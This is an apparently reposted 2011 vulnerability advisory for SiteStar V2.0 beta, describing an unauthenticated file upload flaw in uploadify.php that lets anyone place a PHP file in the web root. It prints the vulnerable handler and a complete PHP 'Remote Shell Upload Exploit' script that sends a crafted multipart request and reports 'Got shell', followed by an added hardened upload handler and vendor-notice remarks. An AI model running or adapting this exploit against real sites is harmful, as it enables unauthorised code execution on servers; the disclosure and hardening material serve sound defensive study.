Published: 2011-03-16

Author: cnryan

Affected version: SiteStar V2.0 beta

Vendor site: http://www.sitestar.cn/

Vulnerability type: file upload

[1] Vulnerability overview:

SiteStar V2.0 does not properly restrict file uploads. A remote attacker can use this to upload arbitrary files into the web directory, which ultimately allows arbitrary command execution on the server.

[2] Vulnerability analysis:

The vulnerability is in the file /script/multiupload/uploadify.php:

<?php
// No authentication, no file-type check, and both the target folder and the
// file name are taken straight from the request.
if (!empty($_FILES)) {
    $tempFile   = $_FILES['Filedata']['tmp_name'];
    $targetPath = $_SERVER['DOCUMENT_ROOT'] . $_POST['folder'] . '/';
    $targetFile = str_replace('//', '/', $targetPath) . $_FILES['Filedata']['name'];
    // Work around garbled Chinese file names on Windows
    if (preg_match("/^WIN/i", PHP_OS)) {
        $targetFile = iconv('UTF-8', 'GBK', $targetFile);
    }
    move_uploaded_file($tempFile, $targetFile);
    echo "1";
}
?>

Not much to say here; it is a basic mistake. A crafted HTML form is enough to upload a webshell directly into the web directory. A test script follows.

<?php
print_r('
+---------------------------------------------------------------------------+
SiteStar V2.0 Remote Shell Upload Exploit
by cnryan
Mail: cnryan2008[at]gmail[dot]com
Blog: http://hi.baidu.com/cnryan
+---------------------------------------------------------------------------+
');
if ($argc < 3)
{
    print "\nUsage: php $argv[0] host path\n";
    print "Example: php $argv[0] localhost /sitestar/\n";
    die();
}
error_reporting(0);
set_time_limit(0);
$host = $argv[1];
$path = $argv[2];
$shell = 'http://'.$host.$path.'cnryan.php';
$payload  = "-----cnryan\r\n";
$payload .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"cnryan.php\"\r\n";
$payload .= "Content-Type: application/octet-stream\r\n\r\n";
$payload .= "<?php phpinfo();?>W.S.T\r\n-----cnryan\r\n";
$payload .= "Content-Disposition: form-data; name=\"upload\"\r\n\r\n\r\n";
$payload .= "-----cnryan\r\n";
$payload .= "Content-Disposition: form-data; name=\"folder\"\r\n\r\n";
$payload .= "$path\r\n";
$payload .= "-----cnryan--";
$packet  = "POST {$path}/script/multiupload/uploadify.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: keep-alive\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=---cnryan\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n\r\n";
$packet .= $payload;
$fp = fsockopen($host, 80);
fputs($fp, $packet);

sleep(5);
$str = file_get_contents($shell);
if (strpos($str, 'W.S.T'))
    exit("OK! Got shell:\t$shell\n");
else
    exit("Exploit Failed!\n");
?>
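For contrast, a hardened version of the uploadify.php handler from [2]. This is an added example, not SiteStar code and not part of the original post. It assumes PHP 7 or later, that uploads are only ever stored below an `uploads` directory under the document root, and that `$_SESSION['uid']` stands in for whatever login check the application actually has.

```php
<?php
// Hardened replacement for uploadify.php (added example, not SiteStar code).
define('UPLOAD_BASE', $_SERVER['DOCUMENT_ROOT'] . '/uploads');
$allowedExt  = array('jpg', 'jpeg', 'png', 'gif', 'pdf');
$allowedMime = array('image/jpeg', 'image/png', 'image/gif', 'application/pdf');

function fail($code, $msg) {
    http_response_code($code);
    exit($msg);
}

session_start();
if (empty($_SESSION['uid'])) {            // assumed login marker; the original had no auth
    fail(403, 'login required');
}
if (empty($_FILES['Filedata']) || $_FILES['Filedata']['error'] !== UPLOAD_ERR_OK) {
    fail(400, 'no file');
}
$tmp = $_FILES['Filedata']['tmp_name'];
if (!is_uploaded_file($tmp)) {
    fail(400, 'not an uploaded file');
}
// 1. The client-supplied "folder" must resolve to a directory inside UPLOAD_BASE.
//    realpath() collapses "../", so anything escaping the upload tree fails here.
$folder = isset($_POST['folder']) ? $_POST['folder'] : '';
$base   = realpath(UPLOAD_BASE);
$target = realpath(UPLOAD_BASE . '/' . $folder);
$sep    = DIRECTORY_SEPARATOR;
if ($base === false || $target === false || strpos($target . $sep, $base . $sep) !== 0) {
    fail(400, 'invalid folder');
}
// 2. Allow-list the extension instead of trusting the client's file name.
$ext = strtolower(pathinfo($_FILES['Filedata']['name'], PATHINFO_EXTENSION));
if (!in_array($ext, $allowedExt, true)) {
    fail(400, 'file type not allowed');
}
// 3. Check the real content type from the bytes, not the client's Content-Type.
$finfo = finfo_open(FILEINFO_MIME_TYPE);
$mime  = finfo_file($finfo, $tmp);
finfo_close($finfo);
if (!in_array($mime, $allowedMime, true)) {
    fail(400, 'content does not match an allowed type');
}
// 4. Store under a server-generated name: the uploader controls neither the
//    name nor the extension the web server will use to choose a handler.
$name = bin2hex(random_bytes(16)) . '.' . $ext;
if (!move_uploaded_file($tmp, $target . $sep . $name)) {
    fail(500, 'store failed');
}
echo "1";
```

Even with these checks, the uploads directory should be configured so the web server never executes scripts from it.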

[4] Vulnerability status:

The vendor has been notified.

[5] Vendor response:

Thank you for your feedback, thanks!


老洞,纯属收集,转自:http://hi.baidu.com/cnryan/blog/item/0d0a4377d9f6790fb151b9e6.html